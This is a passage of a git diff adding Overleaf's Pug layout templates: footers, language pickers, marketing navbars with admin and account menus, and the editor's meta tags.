a(href="/learn/latex/Tutorials") #{translate('tutorials')} + li + a(href="/learn/latex/Inserting_Images") #{translate('how_to_insert_images')} + li + a(href="/learn/latex/Tables") #{translate('how_to_create_tables')} + + .footer-section + h2.footer-section-heading !{translate('footer_plans_and_pricing')} + + ul.list-unstyled + li + a(href="/learn/how-to/Overleaf_premium_features") #{translate('premium_features')} + li + a(href="/user/subscription/plans?itm_referrer=footer-for-indv-groups") !{translate('for_individuals_and_groups')} + li + a(href="/for/enterprises") #{translate('for_business')} + li + a(href="/for/universities") #{translate('for_universities')} + li + a( + data-ol-for-students-link + href="/user/subscription/plans?itm_referrer=footer-for-students#student-annual" + ) #{translate('for_students')} + li + a(href="/for/government") #{translate('for_government')} + + .footer-section + h2.footer-section-heading #{translate('get_involved')} + + ul.list-unstyled + li + a(href="/for/community/advisors") #{translate('become_an_advisor')} + li + a(href="https://forms.gle/67PSpN1bLnjGCmPQ9") #{translate('let_us_know_what_you_think')} + if user + li + a(href="/beta/participate") #{translate('join_beta_program')} + + .footer-section + h2.footer-section-heading #{translate('help')} + + ul.list-unstyled + li + a(href="/about/why-latex") #{translate('why_latex')} + li + a(href="/learn") #{translate('Documentation')} + li + a(href="/contact") #{translate('footer_contact_us')} + li + a(href="https://status.overleaf.com/") #{translate('website_status')} + + include fat-footer-base diff --git a/services/web/app/views/layout/fat-footer.pug b/services/web/app/views/layout/fat-footer.pug new file mode 100644 index 0000000..95de4a3 --- /dev/null +++ b/services/web/app/views/layout/fat-footer.pug @@ -0,0 +1,84 @@ +footer.fat-footer.hidden-print + .fat-footer-container(role="navigation" aria-label=translate('footer_navigation')) + .fat-footer-sections(class=hideFatFooter ? 'hidden' : undefined) + .footer-section#footer-brand + a(href='/', aria-label=settings.appName).footer-brand + + .footer-section + h2.footer-section-heading #{translate('About')} + + ul.list-unstyled + li + a(href="/about") #{translate('footer_about_us')} + li + a(href="/about/values") #{translate('our_values')} + li + a(href="/about/careers") #{translate('careers')} + li + a(href="/for/press") !{translate('press_and_awards')} + li + a(href="/blog") #{translate('blog')} + + .footer-section + h2.footer-section-heading #{translate('learn')} + + ul.list-unstyled + li + a(href="/learn/latex/Learn_LaTeX_in_30_minutes") #{translate('latex_in_thirty_minutes')} + li + a(href="/latex/templates") #{translate('templates')} + li + a(href="/events/webinars") #{translate('webinars')} + li + a(href="/learn/latex/Tutorials") #{translate('tutorials')} + li + a(href="/learn/latex/Inserting_Images") #{translate('how_to_insert_images')} + li + a(href="/learn/latex/Tables") #{translate('how_to_create_tables')} + + .footer-section + h2.footer-section-heading !{translate('footer_plans_and_pricing')} + + ul.list-unstyled + li + a(href="/learn/how-to/Overleaf_premium_features") #{translate('premium_features')} + li + a(href="/user/subscription/plans?itm_referrer=footer-for-indv-groups") !{translate('for_individuals_and_groups')} + li + a(href="/for/enterprises") #{translate('for_enterprise')} + li + a(href="/for/universities") #{translate('for_universities')} + li + a( + data-ol-for-students-link + href="/user/subscription/plans?itm_referrer=footer-for-students#student-annual" + ) #{translate('for_students')} + li + a(href="/for/government") #{translate('for_government')} + + .footer-section + h2.footer-section-heading #{translate('get_involved')} + + ul.list-unstyled + li + a(href="/for/community/advisors") #{translate('become_an_advisor')} + li + a(href="https://forms.gle/67PSpN1bLnjGCmPQ9") #{translate('let_us_know_what_you_think')} + if user + li + a(href="/beta/participate") #{translate('join_beta_program')} + + .footer-section + h2.footer-section-heading #{translate('help')} + + ul.list-unstyled + li + a(href="/about/why-latex") #{translate('why_latex')} + li + a(href="/learn") #{translate('Documentation')} + li + a(href="/contact") #{translate('footer_contact_us')} + li + a(href="https://status.overleaf.com/") #{translate('website_status')} + + include fat-footer-base diff --git a/services/web/app/views/layout/language-picker-bootstrap-5.pug b/services/web/app/views/layout/language-picker-bootstrap-5.pug new file mode 100644 index 0000000..47a9bc5 --- /dev/null +++ b/services/web/app/views/layout/language-picker-bootstrap-5.pug @@ -0,0 +1,25 @@ +li.dropdown.dropup.subdued(dropdown).language-picker + button#language-picker-toggle.btn.btn-link.btn-inline-link( + dropdown-toggle, + data-ol-lang-selector-tooltip, + data-bs-toggle="dropdown", + aria-haspopup="true", + aria-expanded="false", + aria-label="Select " + translate('language'), + tooltip=translate('language') + title=translate('language') + ) + span.material-symbols(aria-hidden="true") translate + |   + span.language-picker-text #{settings.translatedLanguages[currentLngCode]} + + ul.dropdown-menu.dropdown-menu-sm-width(role="menu" aria-labelledby="language-picker-toggle") + li.dropdown-header #{translate("language")} + each subdomainDetails, subdomain in settings.i18n.subdomainLang + if !subdomainDetails.hide + - let isActive = subdomainDetails.lngCode === currentLngCode + li.lng-option + a.menu-indent(href=subdomainDetails.url+currentUrlWithQueryParams, role="menuitem", class=isActive ? 'dropdown-item active' : 'dropdown-item', aria-selected=isActive ? 'true' : 'false') + | #{settings.translatedLanguages[subdomainDetails.lngCode]} + if subdomainDetails.lngCode === currentLngCode + span.material-symbols.dropdown-item-trailing-icon(aria-hidden="true") check diff --git a/services/web/app/views/layout/language-picker.pug b/services/web/app/views/layout/language-picker.pug new file mode 100644 index 0000000..d26d8a8 --- /dev/null +++ b/services/web/app/views/layout/language-picker.pug @@ -0,0 +1,24 @@ +li.dropdown.dropup.subdued(dropdown).language-picker + a.dropdown-toggle#language-picker-toggle( + href="#", + dropdown-toggle, + data-ol-lang-selector-tooltip, + data-toggle="dropdown", + role="button" + aria-haspopup="true", + aria-expanded="false", + aria-label="Select " + translate('language'), + tooltip=translate('language') + title=translate('language') + ) + i.fa.fa-fw.fa-language + | + | #{settings.translatedLanguages[currentLngCode]} + + ul.dropdown-menu(role="menu" aria-labelledby="language-picker-toggle") + li.dropdown-header #{translate("language")} + each subdomainDetails, subdomain in settings.i18n.subdomainLang + if !subdomainDetails.hide + li.lng-option + a.menu-indent(href=subdomainDetails.url+currentUrlWithQueryParams role="menuitem") + | #{settings.translatedLanguages[subdomainDetails.lngCode]} diff --git a/services/web/app/views/layout/layout-no-js.pug b/services/web/app/views/layout/layout-no-js.pug new file mode 100644 index 0000000..c86721a --- /dev/null +++ b/services/web/app/views/layout/layout-no-js.pug @@ -0,0 +1,18 @@ +doctype html +html(lang="en") + + - metadata = metadata || {} + block vars + + head + if (metadata && metadata.title) + title= metadata.title + if metadata && metadata.viewport + meta(name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=yes") + + link(rel="icon", href="/favicon.ico") + + if buildCssPath + link(rel="stylesheet", href=buildCssPath()) + +block body diff --git a/services/web/app/views/layout/navbar-marketing-bootstrap-5.pug b/services/web/app/views/layout/navbar-marketing-bootstrap-5.pug new file mode 100644 index 0000000..ee94394 --- /dev/null +++ b/services/web/app/views/layout/navbar-marketing-bootstrap-5.pug @@ -0,0 +1,201 @@ +include ../_mixins/navbar + +nav.navbar.navbar-default.navbar-main.navbar-expand-lg(class={ + 'website-redesign-navbar': isWebsiteRedesign +}) + .container-fluid.navbar-container + .navbar-header + if settings.nav.custom_logo + a(href='/', aria-label=settings.appName, style='background-image:url("'+settings.nav.custom_logo+'")').navbar-brand + else if (nav.title) + a(href='/', aria-label=settings.appName).navbar-title #{nav.title} + else + a(href='/', aria-label=settings.appName).navbar-brand + + - var enableUpgradeButton = projectDashboardReact && usersBestSubscription && (usersBestSubscription.type === 'free' || usersBestSubscription.type === 'standalone-ai-add-on') + if (enableUpgradeButton) + a.btn.btn-primary.me-2.d-md-none( + href="/user/subscription/plans" + event-tracking="upgrade-button-click" + event-tracking-mb="true" + event-tracking-label="upgrade" + event-tracking-trigger="click" + event-segmentation='{"source": "dashboard-top", "project-dashboard-react": "enabled", "is-dashboard-sidebar-hidden": "true", "is-screen-width-less-than-768px": "true"}' + ) #{translate("upgrade")} + + - var canDisplayAdminMenu = hasAdminAccess() + - var canDisplayAdminRedirect = canRedirectToAdminDomain() + - var canDisplaySplitTestMenu = hasFeature('saas') && (canDisplayAdminMenu || (getSessionUser() && getSessionUser().staffAccess && (getSessionUser().staffAccess.splitTestMetrics || getSessionUser().staffAccess.splitTestManagement))) + - var canDisplaySurveyMenu = hasFeature('saas') && canDisplayAdminMenu + - var canDisplayScriptLogMenu = hasFeature('saas') && canDisplayAdminMenu + + if (typeof suppressNavbarRight === "undefined") + button.navbar-toggler.collapsed( + type="button", + data-bs-toggle="collapse", + data-bs-target="#navbar-main-collapse" + aria-controls="navbar-main-collapse" + aria-expanded="false" + aria-label="Toggle " + translate('navigation') + ) + i.fa.fa-bars(aria-hidden="true") + + .navbar-collapse.collapse#navbar-main-collapse + ul.nav.navbar-nav.navbar-right.ms-auto(role="menubar") + if (canDisplayAdminMenu || canDisplayAdminRedirect || canDisplaySplitTestMenu) + +nav-item.dropdown.subdued + button.dropdown-toggle( + aria-haspopup="true", + aria-expanded="false", + data-bs-toggle="dropdown" + role="menuitem" + event-tracking="menu-expand" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={"item": "admin", "location": "top-menu"} + ) + | Admin + span.caret + +dropdown-menu.dropdown-menu-end + if canDisplayAdminMenu + +dropdown-menu-link-item()(href="/admin") Manage Site + +dropdown-menu-link-item()(href="/admin/user") Manage Users + +dropdown-menu-link-item()(href="/admin/project") Project URL Lookup + if canDisplayAdminRedirect + +dropdown-menu-link-item()(href=settings.adminUrl) Switch to Admin + if canDisplaySplitTestMenu + +dropdown-menu-link-item()(href="/admin/split-test") Manage Feature Flags + if canDisplaySurveyMenu + +dropdown-menu-link-item()(href="/admin/survey") Manage Surveys + if canDisplayScriptLogMenu + +dropdown-menu-link-item()(href="/admin/script-logs") View Script Logs + + // loop over header_extras + each item in nav.header_extras + - + if ((item.only_when_logged_in && getSessionUser()) + || (item.only_when_logged_out && (!getSessionUser())) + || (!item.only_when_logged_out && !item.only_when_logged_in && !item.only_content_pages) + || (item.only_content_pages && (typeof suppressNavContentLinks === "undefined" || !suppressNavContentLinks)) + ){ + var showNavItem = true + } else { + var showNavItem = false + } + + if showNavItem + if item.dropdown + +nav-item.dropdown(class=item.class) + button.dropdown-toggle( + aria-haspopup="true", + aria-expanded="false", + data-bs-toggle="dropdown" + role="menuitem" + event-tracking="menu-expand" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={"item": item.trackingKey, "location": "top-menu"} + ) + | !{translate(item.text)} + span.caret + +dropdown-menu.dropdown-menu-end + each child in item.dropdown + if child.divider + +dropdown-menu-divider + else if child.isContactUs + +dropdown-menu-link-item()(data-ol-open-contact-form-modal="contact-us" data-bs-target="#contactUsModal" href data-bs-toggle="modal" event-tracking="menu-click" event-tracking-mb="true" event-tracking-trigger="click" event-segmentation={"item": "contact", "location": "top-menu"}) + span + | #{translate("contact_us")} + else + if child.url + +dropdown-menu-link-item()( + href=child.url, + class=child.class, + event-tracking="menu-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={ item: child.trackingKey, location: 'top-menu' } + ) !{translate(child.text)} + else + +dropdown-menu-item !{translate(child.text)} + else + +nav-item(class=item.class) + if item.url + +nav-link( + href=item.url, + class=item.class, + event-tracking="menu-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={ item: item.trackingKey, location: 'top-menu' } + ) !{translate(item.text)} + else + | !{translate(item.text)} + + // logged out + if !getSessionUser() + // register link + if hasFeature('registration-page') + +nav-item.primary + +nav-link( + href="/register" + event-tracking="menu-click" + event-tracking-action="clicked" + event-tracking-trigger="click" + event-tracking-mb="true" + event-segmentation={ page: currentUrl, item: 'register', location: 'top-menu' } + ) #{translate('sign_up')} + + // login link + +nav-item + +nav-link( + href="/login" + event-tracking="menu-click" + event-tracking-action="clicked" + event-tracking-trigger="click" + event-tracking-mb="true" + event-segmentation={ page: currentUrl, item: 'login', location: 'top-menu' } + ) #{translate('log_in')} + + // projects link and account menu + if getSessionUser() + +nav-item + +nav-link(href="/project") #{translate('Projects')} + +nav-item.dropdown + button.dropdown-toggle( + aria-haspopup="true", + aria-expanded="false", + data-bs-toggle="dropdown" + role="menuitem" + event-tracking="menu-expand" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={"item": "account", "location": "top-menu"} + ) + | #{translate('Account')} + span.caret + +dropdown-menu.dropdown-menu-end + +dropdown-menu-item + div.disabled.dropdown-item #{getSessionUser().email} + +dropdown-menu-divider + +dropdown-menu-link-item()(href="/user/settings") #{translate('Account Settings')} + if nav.showSubscriptionLink + +dropdown-menu-link-item()(href="/user/subscription") #{translate('subscription')} + +dropdown-menu-divider + +dropdown-menu-item + //- + The button is outside the form but still belongs to it via the form attribute. The reason to do + this is that if the button is inside the form, screen readers will not count it in the total + number of menu items. + button.btn-link.text-left.dropdown-menu-button.dropdown-item( + role="menuitem", + tabindex="-1" + form="logOutForm" + ) + | #{translate('log_out')} + form( + method="POST", + action="/logout", + id="logOutForm" + ) + input(name='_csrf', type='hidden', value=csrfToken) diff --git a/services/web/app/views/layout/navbar-marketing-react-bootstrap-5.pug b/services/web/app/views/layout/navbar-marketing-react-bootstrap-5.pug new file mode 100644 index 0000000..ee0fcd2 --- /dev/null +++ b/services/web/app/views/layout/navbar-marketing-react-bootstrap-5.pug @@ -0,0 +1 @@ +#navbar-container diff --git a/services/web/app/views/layout/navbar-marketing.pug b/services/web/app/views/layout/navbar-marketing.pug new file mode 100644 index 0000000..e0f3600 --- /dev/null +++ b/services/web/app/views/layout/navbar-marketing.pug @@ -0,0 +1,197 @@ +nav.navbar.navbar-default.navbar-main(class={ + 'website-redesign-navbar': isWebsiteRedesign +}) + .container-fluid + .navbar-header + if (typeof(suppressNavbarRight) == "undefined") + button.navbar-toggle.collapsed( + type="button", + data-toggle="collapse", + data-target="#navbar-main-collapse" + aria-label="Toggle " + translate('navigation') + ) + i.fa.fa-bars(aria-hidden="true") + - var enableUpgradeButton = projectDashboardReact && usersBestSubscription && (usersBestSubscription.type === 'free' || usersBestSubscription.type === 'standalone-ai-add-on') + if (enableUpgradeButton) + a.btn.btn-primary.pull-right.me-2.visible-xs( + href="/user/subscription/plans" + event-tracking="upgrade-button-click" + event-tracking-mb="true" + event-tracking-label="upgrade" + event-tracking-trigger="click" + event-segmentation='{"source": "dashboard-top", "project-dashboard-react": "enabled", "is-dashboard-sidebar-hidden": "true", "is-screen-width-less-than-768px": "true"}' + ) #{translate("upgrade")} + if settings.nav.custom_logo + a(href='/', aria-label=settings.appName, style='background-image:url("'+settings.nav.custom_logo+'")').navbar-brand + else if (nav.title) + a(href='/', aria-label=settings.appName).navbar-title #{nav.title} + else + a(href='/', aria-label=settings.appName).navbar-brand + + - var canDisplayAdminMenu = hasAdminAccess() + - var canDisplayAdminRedirect = canRedirectToAdminDomain() + - var canDisplaySplitTestMenu = hasFeature('saas') && (canDisplayAdminMenu || (getSessionUser() && getSessionUser().staffAccess && (getSessionUser().staffAccess.splitTestMetrics || getSessionUser().staffAccess.splitTestManagement))) + - var canDisplaySurveyMenu = hasFeature('saas') && canDisplayAdminMenu + - var canDisplayScriptLogMenu = hasFeature('saas') && canDisplayAdminMenu + + if (typeof(suppressNavbarRight) == "undefined") + .navbar-collapse.collapse#navbar-main-collapse + ul.nav.navbar-nav.navbar-right + if (canDisplayAdminMenu || canDisplayAdminRedirect || canDisplaySplitTestMenu) + li.dropdown.subdued + a.dropdown-toggle( + href="#", + role="button", + aria-haspopup="true", + aria-expanded="false", + data-toggle="dropdown" + event-tracking="menu-expand" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={"item": "admin", "location": "top-menu"} + ) + | Admin + span.caret + ul.dropdown-menu + if canDisplayAdminMenu + li + a(href="/admin") Manage Site + li + a(href="/admin/user") Manage Users + li + a(href="/admin/project") Project URL Lookup + if canDisplayAdminRedirect + li + a(href=settings.adminUrl) Switch to Admin + if canDisplaySplitTestMenu + li + a(href="/admin/split-test") Manage Feature Flags + if canDisplaySurveyMenu + li + a(href="/admin/survey") Manage Surveys + if canDisplayScriptLogMenu + li + a(href="/admin/script-logs") View Script Logs + + // loop over header_extras + each item in nav.header_extras + - + if ((item.only_when_logged_in && getSessionUser()) + || (item.only_when_logged_out && (!getSessionUser())) + || (!item.only_when_logged_out && !item.only_when_logged_in && !item.only_content_pages) + || (item.only_content_pages && (typeof(suppressNavContentLinks) == "undefined" || !suppressNavContentLinks)) + ){ + var showNavItem = true + } else { + var showNavItem = false + } + + if showNavItem + if item.dropdown + li.dropdown(class=item.class) + a.dropdown-toggle( + href="#", + role="button", + aria-haspopup="true", + aria-expanded="false", + data-toggle="dropdown" + event-tracking="menu-expand" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={"item": item.trackingKey, "location": "top-menu"} + ) + | !{translate(item.text)} + span.caret + ul.dropdown-menu + each child in item.dropdown + if child.divider + li.divider + else if child.isContactUs + li + a(data-ol-open-contact-form-modal="contact-us" href event-tracking="menu-click" event-tracking-mb="true" event-tracking-trigger="click" event-segmentation={"item": "contact", "location": "top-menu"}) + span + | #{translate("contact_us")} + else + li + if child.url + a( + href=child.url, + class=child.class, + event-tracking="menu-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={item: item.trackingKey, location: 'top-menu'} + ) !{translate(child.text)} + else + | !{translate(child.text)} + else + li(class=item.class) + if item.url + a( + href=item.url, + class=item.class, + event-tracking="menu-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={ item: item.trackingKey, location: 'top-menu' } + ) !{translate(item.text)} + else + | !{translate(item.text)} + + // logged out + if !getSessionUser() + // register link + if hasFeature('registration-page') + li.primary + a( + href="/register" + event-tracking="menu-click" + event-tracking-action="clicked" + event-tracking-trigger="click" + event-tracking-mb="true" + event-segmentation={ page: currentUrl, item: 'register', location: 'top-menu' } + ) #{translate('sign_up')} + + // login link + li + a( + href="/login" + event-tracking="menu-click" + event-tracking-action="clicked" + event-tracking-trigger="click" + event-tracking-mb="true" + event-segmentation={ page: currentUrl, item: 'login', location: 'top-menu' } + ) #{translate('log_in')} + + // projects link and account menu + if getSessionUser() + li + a(href="/project") #{translate('Projects')} + li.dropdown + a.dropdown-toggle( + href="#", + role="button", + aria-haspopup="true", + aria-expanded="false", + data-toggle="dropdown" + event-tracking="menu-expand" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={"item": "account", "location": "top-menu"} + ) + | #{translate('Account')} + span.caret + ul.dropdown-menu + li + div.subdued #{getSessionUser().email} + li.divider.hidden-xs.hidden-sm + li + a(href="/user/settings") #{translate('Account Settings')} + if nav.showSubscriptionLink + li + a(href="/user/subscription") #{translate('subscription')} + li.divider.hidden-xs.hidden-sm + li + form(method="POST" action="/logout") + input(name='_csrf', type='hidden', value=csrfToken) + button.btn-link.text-left.dropdown-menu-button #{translate('log_out')} diff --git a/services/web/app/views/layout/navbar-website-redesign.pug b/services/web/app/views/layout/navbar-website-redesign.pug new file mode 100644 index 0000000..c4b712e --- /dev/null +++ b/services/web/app/views/layout/navbar-website-redesign.pug @@ -0,0 +1,195 @@ +nav.navbar.navbar-default.navbar-main.website-redesign-navbar + .container-fluid + .navbar-header + if (typeof(suppressNavbarRight) == "undefined") + button.navbar-toggle.collapsed( + type="button", + data-toggle="collapse", + data-target="#navbar-main-collapse" + aria-label="Toggle " + translate('navigation') + ) + i.fa.fa-bars(aria-hidden="true") + - var enableUpgradeButton = projectDashboardReact && usersBestSubscription && (usersBestSubscription.type === 'free' || usersBestSubscription.type === 'standalone-ai-add-on') + if (enableUpgradeButton) + a.btn.btn-primary.pull-right.me-2.visible-xs( + href="/user/subscription/plans" + event-tracking="upgrade-button-click" + event-tracking-mb="true" + event-tracking-label="upgrade" + event-tracking-trigger="click" + event-segmentation='{"source": "dashboard-top", "project-dashboard-react": "enabled", "is-dashboard-sidebar-hidden": "true", "is-screen-width-less-than-768px": "true"}' + ) #{translate("upgrade")} + if settings.nav.custom_logo + a(href='/', aria-label=settings.appName, style='background-image:url("'+settings.nav.custom_logo+'")').navbar-brand + else if (nav.title) + a(href='/', aria-label=settings.appName).navbar-title #{nav.title} + else + a(href='/', aria-label=settings.appName).navbar-brand + + - var canDisplayAdminMenu = hasAdminAccess() + - var canDisplayAdminRedirect = canRedirectToAdminDomain() + - var canDisplaySplitTestMenu = hasFeature('saas') && (canDisplayAdminMenu || (getSessionUser() && getSessionUser().staffAccess && (getSessionUser().staffAccess.splitTestMetrics || getSessionUser().staffAccess.splitTestManagement))) + - var canDisplaySurveyMenu = hasFeature('saas') && canDisplayAdminMenu + - var canDisplayScriptLogMenu = hasFeature('saas') && canDisplayAdminMenu + + if (typeof(suppressNavbarRight) == "undefined") + .navbar-collapse.collapse#navbar-main-collapse + ul.nav.navbar-nav.navbar-right + if (canDisplayAdminMenu || canDisplayAdminRedirect || canDisplaySplitTestMenu) + li.dropdown.subdued + a.dropdown-toggle( + href="#", + role="button", + aria-haspopup="true", + aria-expanded="false", + data-toggle="dropdown" + event-tracking="menu-expand" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={"item": "admin", "location": "top-menu"} + ) + | Admin + span.caret + ul.dropdown-menu + if canDisplayAdminMenu + li + a(href="/admin") Manage Site + li + a(href="/admin/user") Manage Users + li + a(href="/admin/project") Project URL Lookup + if canDisplayAdminRedirect + li + a(href=settings.adminUrl) Switch to Admin + if canDisplaySplitTestMenu + li + a(href="/admin/split-test") Manage Feature Flags + if canDisplaySurveyMenu + li + a(href="/admin/survey") Manage Surveys + if canDisplayScriptLogMenu + li + a(href="/admin/script-logs") View Script Logs + + // loop over header_extras + each item in nav.header_extras + - + if ((item.only_when_logged_in && getSessionUser()) + || (item.only_when_logged_out && (!getSessionUser())) + || (!item.only_when_logged_out && !item.only_when_logged_in && !item.only_content_pages) + || (item.only_content_pages && (typeof(suppressNavContentLinks) == "undefined" || !suppressNavContentLinks)) + ){ + var showNavItem = true + } else { + var showNavItem = false + } + + if showNavItem + if item.dropdown + li.dropdown(class=item.class) + a.dropdown-toggle( + href="#", + role="button", + aria-haspopup="true", + aria-expanded="false", + data-toggle="dropdown" + event-tracking="menu-expand" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={"item": item.trackingKey, "location": "top-menu"} + ) + | !{translate(item.text)} + span.caret + ul.dropdown-menu + each child in item.dropdown + if child.divider + li.divider + else if child.isContactUs + li + a(data-ol-open-contact-form-modal="contact-us" href event-tracking="menu-click" event-tracking-mb="true" event-tracking-trigger="click" event-segmentation={"item": "contact", "location": "top-menu"}) + span + | #{translate("contact_us")} + else + li + if child.url + a( + href=child.url, + class=child.class, + event-tracking="menu-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={item: child.trackingKey, location: 'top-menu'} + ) !{translate(child.text)} + else + | !{translate(child.text)} + else + li(class=item.class) + if item.url + a( + href=item.url, + class=item.class, + event-tracking="menu-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={ item: item.trackingKey, location: 'top-menu' } + ) !{translate(item.text)} + else + | !{translate(item.text)} + + // logged out + if !getSessionUser() + // register link + if hasFeature('registration-page') + li.primary + a( + href="/register" + event-tracking="menu-click" + event-tracking-action="clicked" + event-tracking-trigger="click" + event-tracking-mb="true" + event-segmentation={ page: currentUrl, item: 'register', location: 'top-menu' } + ) #{translate('sign_up')} + + // login link + li.secondary + a( + href="/login" + event-tracking="menu-click" + event-tracking-action="clicked" + event-tracking-trigger="click" + event-tracking-mb="true" + event-segmentation={ page: currentUrl, item: 'login', location: 'top-menu' } + ) #{translate('log_in')} + + // projects link and account menu + if getSessionUser() + li.secondary + a(href="/project") #{translate('Projects')} + li.secondary.dropdown + a.dropdown-toggle( + href="#", + role="button", + aria-haspopup="true", + aria-expanded="false", + data-toggle="dropdown" + event-tracking="menu-expand" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={"item": "account", "location": "top-menu"} + ) + | #{translate('Account')} + span.caret + ul.dropdown-menu + li + div.subdued #{getSessionUser().email} + li.divider.hidden-xs.hidden-sm + li + a(href="/user/settings") #{translate('Account Settings')} + if nav.showSubscriptionLink + li + a(href="/user/subscription") #{translate('subscription')} + li.divider.hidden-xs.hidden-sm + li + form(method="POST" action="/logout") + input(name='_csrf', type='hidden', value=csrfToken) + button.btn-link.text-left.dropdown-menu-button #{translate('log_out')} diff --git a/services/web/app/views/layout/thin-footer-bootstrap-5.pug b/services/web/app/views/layout/thin-footer-bootstrap-5.pug new file mode 100644 index 0000000..1f06a05 --- /dev/null +++ b/services/web/app/views/layout/thin-footer-bootstrap-5.pug @@ -0,0 +1,38 @@ +footer.site-footer + - var showLanguagePicker = Object.keys(settings.i18n.subdomainLang).length > 1 + - var hasCustomLeftNav = nav.left_footer && nav.left_footer.length > 0 + .site-footer-content.hidden-print + .row + ul.site-footer-items.col-lg-9 + if !settings.nav.hide_powered_by + li + //- year of Server Pro release, static + | © 2025 + | + a(href='https://www.overleaf.com/for/enterprises') Powered by Overleaf + + if showLanguagePicker || hasCustomLeftNav + li + strong.text-muted | + + if showLanguagePicker + include language-picker-bootstrap-5 + + if showLanguagePicker && hasCustomLeftNav + li + strong.text-muted | + + each item in nav.left_footer + li + if item.url + a(href=item.url, class=item.class) !{translate(item.text)} + else + | !{item.text} + + ul.site-footer-items.col-lg-3.text-end + each item in nav.right_footer + li + if item.url + a(href=item.url, class=item.class, aria-label=item.label) !{item.text} + else + | !{item.text} diff --git a/services/web/app/views/layout/thin-footer.pug b/services/web/app/views/layout/thin-footer.pug new file mode 100644 index 0000000..6eeecf6 --- /dev/null +++ b/services/web/app/views/layout/thin-footer.pug @@ -0,0 +1,40 @@ +footer.site-footer + - var showLanguagePicker = Object.keys(settings.i18n.subdomainLang).length > 1 + - var hasCustomLeftNav = nav.left_footer && nav.left_footer.length > 0 + .site-footer-content.hidden-print + .row + ul.col-md-9 + if hasFeature('saas') + li © #{new Date().getFullYear()} Overleaf + else if !settings.nav.hide_powered_by + li + //- year of Server Pro release, static + | © 2025 + | + a(href='https://www.overleaf.com/for/enterprises') Powered by Overleaf + + if showLanguagePicker || hasCustomLeftNav + li + strong.text-muted | + + if showLanguagePicker + include language-picker + + if showLanguagePicker && hasCustomLeftNav + li + strong.text-muted | + + each item in nav.left_footer + li + if item.url + a(href=item.url, class=item.class) !{translate(item.text)} + else + | !{item.text} + + ul.col-md-3.text-right + each item in nav.right_footer + li + if item.url + a(href=item.url, class=item.class, aria-label=item.label) !{item.text} + else + | !{item.text} diff --git a/services/web/app/views/project/editor/_meta.pug b/services/web/app/views/project/editor/_meta.pug new file mode 100644 index 0000000..61b7dd7 --- /dev/null +++ b/services/web/app/views/project/editor/_meta.pug @@ -0,0 +1,61 @@ +meta(name="ol-project_id" content=project_id) +meta(name="ol-projectName" content=projectName) +meta(name="ol-userSettings" data-type="json" content=userSettings) +meta(name="ol-user" data-type="json" content=user) +meta(name="ol-labsExperiments" data-type="json" content=labsExperiments) +meta(name="ol-learnedWords" data-type="json" content=learnedWords) +meta(name="ol-anonymous" data-type="boolean" content=anonymous) +meta(name="ol-brandVariation" data-type="json" content=brandVariation) +meta(name="ol-isTokenMember" data-type="boolean" content=isTokenMember) +meta(name="ol-isRestrictedTokenMember" data-type="boolean" content=isRestrictedTokenMember) +meta(name="ol-maxDocLength" data-type="json" content=maxDocLength) +meta(name="ol-maxReconnectGracefullyIntervalMs" data-type="json" content=maxReconnectGracefullyIntervalMs) +meta(name="ol-wikiEnabled" data-type="boolean" content=settings.proxyLearn) +meta(name="ol-chatEnabled" data-type="boolean" content=chatEnabled) +meta(name="ol-projectHistoryBlobsEnabled" data-type="boolean" content=projectHistoryBlobsEnabled) +meta(name="ol-gitBridgePublicBaseUrl" content=gitBridgePublicBaseUrl) +meta(name="ol-gitBridgeEnabled" data-type="boolean" content=gitBridgeEnabled) +meta(name="ol-compilesUserContentDomain" content=settings.compilesUserContentDomain) +//- enable doc hash checking for all projects +//- used in public/js/libs/sharejs.js +meta(name="ol-useShareJsHash" data-type="boolean" content=true) +meta(name="ol-wsUrl" data-type="string" content=wsUrl) +meta(name="ol-wsRetryHandshake" data-type="json" content=settings.wsRetryHandshake) +meta(name="ol-debugPdfDetach" data-type="boolean" content=debugPdfDetach) +meta(name="ol-showSymbolPalette" data-type="boolean" content=showSymbolPalette) +meta(name="ol-symbolPaletteAvailable" data-type="boolean" content=symbolPaletteAvailable) +meta(name="ol-showAiErrorAssistant" data-type="boolean" content=showAiErrorAssistant) +meta(name="ol-detachRole" data-type="string" content=detachRole) +meta(name="ol-allowedImageNames" data-type="json" content=allowedImageNames) +meta(name="ol-languages" data-type="json" content=languages) +meta(name="ol-editorThemes" data-type="json" content=editorThemes) +meta(name="ol-legacyEditorThemes" data-type="json" content=legacyEditorThemes) +meta(name="ol-showUpgradePrompt" data-type="boolean" content=showUpgradePrompt) +meta(name="ol-showSupport", data-type="boolean" content=showSupport) +meta(name="ol-showTemplatesServerPro", data-type="boolean" content=showTemplatesServerPro) +meta(name="ol-hasTrackChangesFeature", data-type="boolean" content=hasTrackChangesFeature) +meta(name="ol-inactiveTutorials", data-type="json" content=user.inactiveTutorials) +meta(name="ol-projectTags" data-type="json" content=projectTags) +meta(name="ol-ro-mirror-on-client-no-local-storage" data-type="boolean" content=roMirrorOnClientNoLocalStorage) +meta(name="ol-isSaas" data-type="boolean" content=isSaas) +meta(name="ol-shouldLoadHotjar" data-type="boolean" content=shouldLoadHotjar) +meta(name="ol-isReviewerRoleEnabled" data-type="boolean" content=isReviewerRoleEnabled) +meta(name="ol-odcRole" data-type="string" content=odcRole) +meta(name="ol-isPaywallChangeCompileTimeoutEnabled" data-type="boolean" content=isPaywallChangeCompileTimeoutEnabled) +meta(name='ol-customerIoEnabled' data-type="boolean" content=customerIoEnabled) +if(isPaywallChangeCompileTimeoutEnabled) + //- expose plans info to show prices in paywall-change-compile-timeout test + meta(name="ol-paywallPlans", 